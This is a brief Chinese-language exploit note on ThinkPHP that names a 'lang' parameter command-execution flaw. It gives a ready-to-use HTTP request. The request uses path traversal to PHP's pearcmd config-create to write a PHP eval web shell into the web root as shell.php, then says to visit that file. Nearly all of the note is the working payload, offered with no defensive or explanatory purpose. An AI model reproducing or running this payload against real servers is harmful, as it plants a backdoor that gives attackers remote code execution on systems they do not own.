Thinkphp版本主要有3、5、6,相关漏洞比较多,可以使用两款工具来探测。
工具未集成的漏洞存在thinkphp lang 命令执行
thinkphp lang 命令执行
环境启动
PAYLOAD
GET /public/index.php?+config-create+/&lang=../../../../../../../../../../../usr/local/lib/php/pearcmd&/<?=@eval($_POST['cmd']);?>+/var/www/html/shell.php HTTP/1.1
之后访问shell.php